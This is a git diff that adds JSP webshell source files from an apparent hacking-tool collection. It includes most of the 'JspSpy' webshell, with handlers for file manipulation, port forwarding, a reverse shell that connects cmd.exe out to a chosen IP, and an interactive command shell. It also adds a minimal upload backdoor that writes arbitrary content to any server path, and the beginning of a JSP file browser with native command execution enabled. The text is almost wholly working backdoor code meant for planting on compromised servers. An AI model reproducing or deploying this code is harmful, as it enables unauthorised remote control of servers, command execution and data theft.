invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.baidu.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
      • "); +} +out.println("

    System Environment >>

      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
      • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//?????? +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> diff --git a/jsp/hackk8/JSP/minupload.jsp b/jsp/hackk8/JSP/minupload.jsp new file mode 100644 index 0000000..3994c00 --- /dev/null +++ b/jsp/hackk8/JSP/minupload.jsp @@ -0,0 +1,48 @@ + + <%@page contentType="text/html;charset=utf-8"%> + <%@page import="java.io.*,java.util.*,java.net.*"%> + + + JspDo Code By Xiao.3 + + + + <% + if(request.getParameter("context")!=null) + { //这小马有问题 上传jsp就出错 + String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"utf-8"); + String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"utf-8"); + OutputStream pt = null; + try { + pt = new FileOutputStream(path); + pt.write(context.getBytes()); + out.println("上传成功!"); + } catch (FileNotFoundException ex2) { + out.println("上传失败!"); + } catch (IOException ex) { + out.println("上传失败!"); + } finally { + try { + pt.close(); + } catch (IOException ex3) { + out.println("上传失败!"); + } + } + } + %> +
    + 本文件的路径:<%out.print(request.getRealPath(request.getServletPath())); %> +
    +
    + 上传文件路径:"> +
    +
    + 上传文件内容: +
    +
    + +
    + + \ No newline at end of file diff --git a/jsp/hackk8/JSP/other/download.jsp b/jsp/hackk8/JSP/other/download.jsp new file mode 100644 index 0000000..85c73d1 --- /dev/null +++ b/jsp/hackk8/JSP/other/download.jsp @@ -0,0 +1,1913 @@ +<%@page import="java.util.*, + java.net.*, + java.text.*, + java.util.zip.*, + java.io.*" +%> +<%! + //FEATURES + private static final boolean NATIVE_COMMANDS = true; + /** + *If true, all operations (besides upload and native commands) + *which change something on the file system are permitted + */ + private static final boolean READ_ONLY = false; + //If true, uploads are allowed even if READ_ONLY = true + private static final boolean ALLOW_UPLOAD = true; + + //Allow browsing and file manipulation only in certain directories + private static final boolean RESTRICT_BROWSING = false; + //If true, the user is allowed to browse only in RESTRICT_PATH, + //if false, the user is allowed to browse all directories besides RESTRICT_PATH + private static final boolean RESTRICT_WHITELIST = false; + //Paths, sperated by semicolon + //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!! + private static final String RESTRICT_PATH = "/etc;/var"; + + //The refresh time in seconds of the upload monitor window + private static final int UPLOAD_MONITOR_REFRESH = 2; + //The number of colums for the edit field + private static final int EDITFIELD_COLS = 85; + //The number of rows for the edit field + private static final int EDITFIELD_ROWS = 30; + //Open a new window to view a file + private static final boolean USE_POPUP = true; + /** + * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be + * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries. + * This can yield to performance issues. Turn it off, if the directory loads to slow. + */ + private static final boolean USE_DIR_PREVIEW = false; + private static final int DIR_PREVIEW_NUMBER = 10; + /** + * The name of an optional CSS Stylesheet file + */ + private static final String CSS_NAME = "Browser.css"; + /** + * The compression level for zip file creation (0-9) + * 0 = No compression + * 1 = Standard compression (Very fast) + * ... + * 9 = Best compression (Very slow) + */ + private static final int COMPRESSION_LEVEL = 1; + /** + * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the + * server runs on a windows platform, to avoid a message box, if you try to access + * an empty removable drive (See KNOWN BUGS in Readme.txt). + */ + private static final String[] FORBIDDEN_DRIVES = {"a:\\"}; + + /** + * Command of the shell interpreter and the parameter to run a programm + */ + private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows + //private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // Unix + + /** + * Max time in ms a process is allowed to run, before it will be terminated + */ + private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds + + //Button names + private static final String SAVE_AS_ZIP = "Download selected files as (z)ip"; + private static final String RENAME_FILE = "(R)ename File"; + private static final String DELETE_FILES = "(Del)ete selected files"; + private static final String CREATE_DIR = "Create (D)ir"; + private static final String CREATE_FILE = "(C)reate File"; + private static final String MOVE_FILES = "(M)ove Files"; + private static final String COPY_FILES = "Cop(y) Files"; + private static final String LAUNCH_COMMAND = "(L)aunch external program"; + private static final String UPLOAD_FILES = "Upload"; + + //Normally you should not change anything after this line + //---------------------------------------------------------------------------------- + //Change this to locate the tempfile directory for upload (not longer needed) + private static String tempdir = "."; + private static String VERSION_NR = "1.2"; + private static DateFormat dateFormat = DateFormat.getDateTimeInstance(); + + public class UplInfo { + + public long totalSize; + public long currSize; + public long starttime; + public boolean aborted; + + public UplInfo() { + totalSize = 0l; + currSize = 0l; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public UplInfo(int size) { + totalSize = size; + currSize = 0; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public String getUprate() { + long time = System.currentTimeMillis() - starttime; + if (time != 0) { + long uprate = currSize * 1000 / time; + return convertFileSize(uprate) + "/s"; + } + else return "n/a"; + } + + public int getPercent() { + if (totalSize == 0) return 0; + else return (int) (currSize * 100 / totalSize); + } + + public String getTimeElapsed() { + long time = (System.currentTimeMillis() - starttime) / 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + public String getTimeEstimated() { + if (currSize == 0) return "n/a"; + long time = System.currentTimeMillis() - starttime; + time = totalSize * time / currSize; + time /= 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + } + + public class FileInfo { + + public String name = null, clientFileName = null, fileContentType = null; + private byte[] fileContents = null; + public File file = null; + public StringBuffer sb = new StringBuffer(100); + + public void setFileContents(byte[] aByteArray) { + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } + } + + public static class UploadMonitor { + + static Hashtable uploadTable = new Hashtable(); + + static void set(String fName, UplInfo info) { + uploadTable.put(fName, info); + } + + static void remove(String fName) { + uploadTable.remove(fName); + } + + static UplInfo getInfo(String fName) { + UplInfo info = (UplInfo) uploadTable.get(fName); + return info; + } + } + + // A Class with methods used to process a ServletInputStream + public class HttpMultiPartParser { + + //private final String lineSeparator = System.getProperty("line.separator", "\n"); + private final int ONE_MB = 1024 * 1; + + public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, + int clength) throws IllegalArgumentException, IOException { + if (is == null) throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( + "\"" + boundary + "\" is an illegal boundary indicator"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); + boolean isFile = false; + if (saveFiles) { // Create the required directory (including parent dirs) + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) throw new IOException( + "Boundary not found; boundary = " + boundary + ", line = " + line); + while (line != null) { + if (line == null || !line.startsWith(boundary)) return dataTable; + line = getLine(is); + if (line == null) return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( + "Bad data in second line"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()) { + field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1) { + if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { + fileInfo.name = paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0) { + fileInfo.clientFileName = value; + isFile = true; + } + else { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + } + else if (field.toLowerCase().indexOf("filename") >= 0) { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + boolean skipBlankLine = true; + if (isFile) { + line = getLine(is); + if (line == null) return dataTable; + if (line.trim().length() < 1) skipBlankLine = false; + else { + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in third line"); + stLine.nextToken(); // Content-Type + fileInfo.fileContentType = stLine.nextToken(); + } + } + if (skipBlankLine) { + line = getLine(is); + if (line == null) return dataTable; + } + if (!isFile) { + line = getLine(is); + if (line == null) return dataTable; + dataTable.put(paramName, line); + // If parameter is dir, change saveInDir to dir + if (paramName.equals("dir")) saveInDir = line; + line = getLine(is); + continue; + } + try { + UplInfo uplInfo = new UplInfo(clength); + UploadMonitor.set(fileInfo.clientFileName, uplInfo); + OutputStream os = null; + String path = null; + if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, + fileInfo.clientFileName)); + else os = new ByteArrayOutputStream(ONE_MB); + boolean readingContent = true; + byte previousLine[] = new byte[2 * ONE_MB]; + byte temp[] = null; + byte currentLine[] = new byte[2 * ONE_MB]; + int read, read3; + if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { + line = null; + break; + } + while (readingContent) { + if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { + line = null; + uplInfo.aborted = true; + break; + } + if (compareBoundary(boundary, currentLine)) { + os.write(previousLine, 0, read - 2); + line = new String(currentLine, 0, read3); + break; + } + else { + os.write(previousLine, 0, read); + uplInfo.currSize += read; + temp = currentLine; + currentLine = previousLine; + previousLine = temp; + read = read3; + }//end else + }//end while + os.flush(); + os.close(); + if (!saveFiles) { + ByteArrayOutputStream baos = (ByteArrayOutputStream) os; + fileInfo.setFileContents(baos.toByteArray()); + } + else fileInfo.file = new File(path); + dataTable.put(paramName, fileInfo); + uplInfo.currSize = uplInfo.totalSize; + }//end try + catch (IOException e) { + throw e; + } + } + return dataTable; + } + + /** + * Compares boundary string to byte array + */ + private boolean compareBoundary(String boundary, byte ba[]) { + if (boundary == null || ba == null) return false; + for (int i = 0; i < boundary.length(); i++) + if ((byte) boundary.charAt(i) != ba[i]) return false; + return true; + } + + /** Convenience method to read HTTP header lines */ + private synchronized String getLine(ServletInputStream sis) throws IOException { + byte b[] = new byte[1024]; + int read = sis.readLine(b, 0, b.length), index; + String line = null; + if (read != -1) { + line = new String(b, 0, read); + if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); + } + return line; + } + + public String getFileName(String dir, String fileName) throws IllegalArgumentException { + String path = null; + if (dir == null || fileName == null) throw new IllegalArgumentException( + "dir or fileName is 